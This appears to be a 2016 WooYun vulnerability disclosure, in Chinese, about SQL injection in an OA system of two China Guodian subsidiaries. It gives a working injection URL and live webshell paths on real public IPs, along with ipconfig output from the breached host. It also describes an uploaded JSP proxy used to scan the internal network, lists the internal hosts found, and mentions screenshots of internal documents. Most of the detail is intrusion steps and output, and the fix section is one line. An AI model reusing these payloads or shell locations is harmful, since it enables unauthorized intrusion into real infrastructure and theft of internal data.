当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0182065

漏洞标题:中国国电旗下两公司SQL注入导致getshell(涉及内网安全)

相关厂商:中国国电集团公司

漏洞作者: 路人甲

提交时间:2016-03-07 23:48

修复时间:2016-03-12 23:50

公开时间:2016-03-12 23:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-07: 细节已通知厂商并且等待厂商处理中
2016-03-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

涉及到内网安全

详细说明:

http://60.13.13.239:8080/yyoa/


http://60.13.13.239:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20database()

序号	@@basedir
1 D:\Program Files\UFseeyon\OA\mysql\bin\..\


具体拿shell方法见

 WooYun: 东方航空传媒公司一个被忽略漏洞引发的血案(可getshell) 


得到shell

http://60.13.13.239:8080/yyoa/wel.jsp
http://60.13.13.239:8080/yyoa/cmd.jsp


shell.png


ipconfig

以太网适配器 本地连接:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::50fc:d4c8:8aee:b822%11
IPv4 地址 . . . . . . . . . . . . : 10.100.130.5
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . : 10.100.130.254


传了一个内网扫描的jsp代理

http://10.100.130.4 >> >>Apache-Coyote/1.1 >>Success
http://10.100.130.5 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.100.130.11 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.12 >> >>Microsoft-IIS/6.0 >>Success
http://10.100.130.6 >> ���>>Apache >>Success
http://10.100.130.101 >> ���>>Apache >>Success
http://10.100.130.253 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success
http://10.100.130.252 >> Webview Logon Page>>Agranat-EmWeb/R5_2_4 >>Success


一些内部文档信息和log

内部资料.png


登陆log.png

漏洞证明:

http://222.89.154.134:8080/yyoa/


shell地址:
http://222.89.154.134:8080/yyoa/cmd.jsp

shell2.png


修复方案:

升级程序,打补丁

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-03-12 23:50

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无